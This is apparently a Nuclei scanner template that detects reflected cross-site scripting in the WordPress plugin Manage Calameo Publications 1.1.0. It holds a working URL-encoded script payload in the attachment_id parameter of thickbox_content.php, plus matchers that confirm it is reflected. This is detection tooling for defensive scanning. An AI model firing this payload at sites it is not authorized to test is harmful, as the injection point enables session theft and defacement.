id: calameo-publications-xss

info:
  name: WordPress Manage Calameo Publications 1.1.0 - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    WordPress Manage Calameo Publications 1.1.0 is vulnerable to reflected cross-site scripting via  thickbox_content.php and the attachment_id parameter.
  reference:
    - https://codevigilant.com/disclosure/wp-plugin-athlon-manage-calameo-publications-a3-cross-site-scripting-xss/
    - https://wpscan.com/vulnerability/83343eb3-bb4c-4b82-adf6-745882f872cc
    - https://wordpress.org/plugins/athlon-manage-calameo-publications/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    verified: true
    max-request: 1
  tags: wordpress,wp-plugin,xss,wp,wpscan

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/athlon-manage-calameo-publications/thickbox_content.php?attachment_id=id%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%26"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ath_upload_calameo_publication(id\"><script>alert(document.domain)</script>&)'

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 490a0046304402204649558e6270b7fafe354ba7042a5f476da679eef1b6020d8d9372284ad06428022056cfdfb56eb848cfbdc62278a1bd6844b0c8655232bf8f48566bc5a87953b82a:922c64590222798bb761d5b6d8e72950